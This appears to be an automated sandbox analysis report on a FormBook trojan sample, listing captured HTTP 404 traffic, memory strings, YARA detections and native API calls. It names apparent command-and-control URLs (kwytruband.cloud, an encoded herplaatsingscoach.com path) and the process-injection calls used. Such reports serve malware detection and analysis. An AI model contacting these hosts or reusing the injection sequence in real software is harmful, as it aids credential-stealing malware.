Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:04:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:04:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:04:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:04:32 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y6pxFABqXtxJvrONqvuFsVsaSJzrV1xD8nqLaLYsZb4ERPT%2FMkBHOokIu1qdhuw%2Bzm2BEL1LNAqq4TKNX15qK%2BwqlRXyQfByJrVWF6wQPlAZCn8HMtJ062jrSuz0RweJyd2g"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81ca8195842d5-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:04:38 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FfI7mwRydcF%2BegD0Ys4E0V89YYV9R24JEdjTNgx2WcyTQJp6CvewaV0QFmT7fTHFFU7nNwjUSt3bPzDblxo0E4kRdpq1zzzf%2F4qVMEEdfg77mllqm%2F%2B8sxqVbyTpCG1nrDoN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81cc7cf8841e0-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:04:40 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dj9Zn3o4qcGLdsexIOaF0271SkXyAlEP0kR%2BKyI6FKYLSg5b%2B0v4Nr59MVG6TnnFUG7vcLMfnGy94j2g4owQDW2qN01vKHnGo7zTcxFIfyJcAj92EaK2BGilcMjIDlbfbExz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81cd78da2c329-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: ZkqZZBQxQqm.exe, 00000009.00000002.3264294523.000000000562C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.kwytruband.cloud
Source: ZkqZZBQxQqm.exe, 00000009.00000002.3264294523.000000000562C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.kwytruband.cloud/siy1/
Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: systray.exe, 00000008.00000002.3260476733.00000000034A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: systray.exe, 00000008.00000002.3260476733.00000000034A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: systray.exe, 00000008.00000003.1966731066.000000000824C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: systray.exe, 00000008.00000002.3260476733.00000000034A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: systray.exe, 00000008.00000002.3260476733.00000000034A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033V
Source: systray.exe, 00000008.00000002.3260476733.00000000034A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: systray.exe, 00000008.00000002.3260476733.00000000034A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: systray.exe, 00000008.00000002.3263725709.0000000006874000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.3265428680.0000000007FC0000.00000004.00000800.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000002.3262249137.0000000004204000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: systray.exe, 00000008.00000002.3263725709.000000000622C000.00000004.10000000.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000002.3262249137.0000000003BBC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.herplaatsingscoach.com/wwqg/?Efup=cPWBLmqfYdwFLm3BEseWSNTw863lhs9YSZmOJUbUOjzc/4eC4u1GiX
Source: systray.exe, 00000008.00000002.3263725709.00000000066E2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.3265428680.0000000007FC0000.00000004.00000800.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000002.3262249137.0000000004072000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.CMV610942X6UI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.CMV610942X6UI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.CMV610942X6UI.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.CMV610942X6UI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
.NET source code contains very large array initializations
Source: 0.2.CMV610942X6UI.exe.2a0c2d0.1.raw.unpack, -Module-.cs Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
Source: 0.2.CMV610942X6UI.exe.5570000.4.raw.unpack, -Module-.cs Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
Contains functionality to call native functions
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 0_2_027F2210 NtUnmapViewOfSection, 0_2_027F2210
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 0_2_027F2209 NtUnmapViewOfSection, 0_2_027F2209
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0042AC23 NtClose, 3_2_0042AC23
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2B60 NtClose,LdrInitializeThunk, 3_2_00FB2B60
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00FB2C70
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00FB2DF0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB35C0 NtCreateMutant,LdrInitializeThunk, 3_2_00FB35C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB4340 NtSetContextThread, 3_2_00FB4340
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB4650 NtSuspendThread, 3_2_00FB4650
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2AF0 NtWriteFile, 3_2_00FB2AF0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2AD0 NtReadFile, 3_2_00FB2AD0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2AB0 NtWaitForSingleObject, 3_2_00FB2AB0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2BF0 NtAllocateVirtualMemory, 3_2_00FB2BF0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2BE0 NtQueryValueKey, 3_2_00FB2BE0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2BA0 NtEnumerateValueKey, 3_2_00FB2BA0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2B80 NtQueryInformationFile, 3_2_00FB2B80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2CF0 NtOpenProcess, 3_2_00FB2CF0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2CC0 NtQueryVirtualMemory, 3_2_00FB2CC0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2CA0 NtQueryInformationToken, 3_2_00FB2CA0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2C60 NtCreateKey, 3_2_00FB2C60
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2C00 NtQueryInformationProcess, 3_2_00FB2C00
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2DD0 NtDelayExecution, 3_2_00FB2DD0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2DB0 NtEnumerateKey, 3_2_00FB2DB0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2D30 NtUnmapViewOfSection, 3_2_00FB2D30
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2D10 NtMapViewOfSection, 3_2_00FB2D10
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2D00 NtSetInformationFile, 3_2_00FB2D00
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2EE0 NtQueueApcThread, 3_2_00FB2EE0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2EA0 NtAdjustPrivilegesToken, 3_2_00FB2EA0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2E80 NtReadVirtualMemory, 3_2_00FB2E80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2E30 NtWriteVirtualMemory, 3_2_00FB2E30
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2FE0 NtCreateFile, 3_2_00FB2FE0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2FB0 NtResumeThread, 3_2_00FB2FB0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2FA0 NtQuerySection, 3_2_00FB2FA0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2F90 NtProtectVirtualMemory, 3_2_00FB2F90
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2F60 NtCreateProcessEx, 3_2_00FB2F60
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB2F30 NtCreateSection, 3_2_00FB2F30
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB3090 NtSetValueKey, 3_2_00FB3090
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB3010 NtOpenDirectoryObject, 3_2_00FB3010
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB39B0 NtGetContextThread, 3_2_00FB39B0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB3D70 NtOpenThread, 3_2_00FB3D70
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB3D10 NtOpenProcessToken, 3_2_00FB3D10
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05244650 NtSuspendThread,LdrInitializeThunk, 8_2_05244650
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05244340 NtSetContextThread,LdrInitializeThunk, 8_2_05244340
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242D30 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_05242D30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_05242D10
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_05242DF0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242DD0 NtDelayExecution,LdrInitializeThunk, 8_2_05242DD0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242C60 NtCreateKey,LdrInitializeThunk, 8_2_05242C60
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_05242C70
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_05242CA0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242F30 NtCreateSection,LdrInitializeThunk, 8_2_05242F30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242FB0 NtResumeThread,LdrInitializeThunk, 8_2_05242FB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242FE0 NtCreateFile,LdrInitializeThunk, 8_2_05242FE0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242E80 NtReadVirtualMemory,LdrInitializeThunk, 8_2_05242E80
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242EE0 NtQueueApcThread,LdrInitializeThunk, 8_2_05242EE0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242B60 NtClose,LdrInitializeThunk, 8_2_05242B60
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242BA0 NtEnumerateValueKey,LdrInitializeThunk, 8_2_05242BA0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242BE0 NtQueryValueKey,LdrInitializeThunk, 8_2_05242BE0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_05242BF0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242AF0 NtWriteFile,LdrInitializeThunk, 8_2_05242AF0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242AD0 NtReadFile,LdrInitializeThunk, 8_2_05242AD0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052435C0 NtCreateMutant,LdrInitializeThunk, 8_2_052435C0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052439B0 NtGetContextThread,LdrInitializeThunk, 8_2_052439B0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242D00 NtSetInformationFile, 8_2_05242D00
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242DB0 NtEnumerateKey, 8_2_05242DB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242C00 NtQueryInformationProcess, 8_2_05242C00
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242CF0 NtOpenProcess, 8_2_05242CF0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242CC0 NtQueryVirtualMemory, 8_2_05242CC0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242F60 NtCreateProcessEx, 8_2_05242F60
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242FA0 NtQuerySection, 8_2_05242FA0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242F90 NtProtectVirtualMemory, 8_2_05242F90
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242E30 NtWriteVirtualMemory, 8_2_05242E30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242EA0 NtAdjustPrivilegesToken, 8_2_05242EA0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242B80 NtQueryInformationFile, 8_2_05242B80
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05242AB0 NtWaitForSingleObject, 8_2_05242AB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05243010 NtOpenDirectoryObject, 8_2_05243010
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05243090 NtSetValueKey, 8_2_05243090
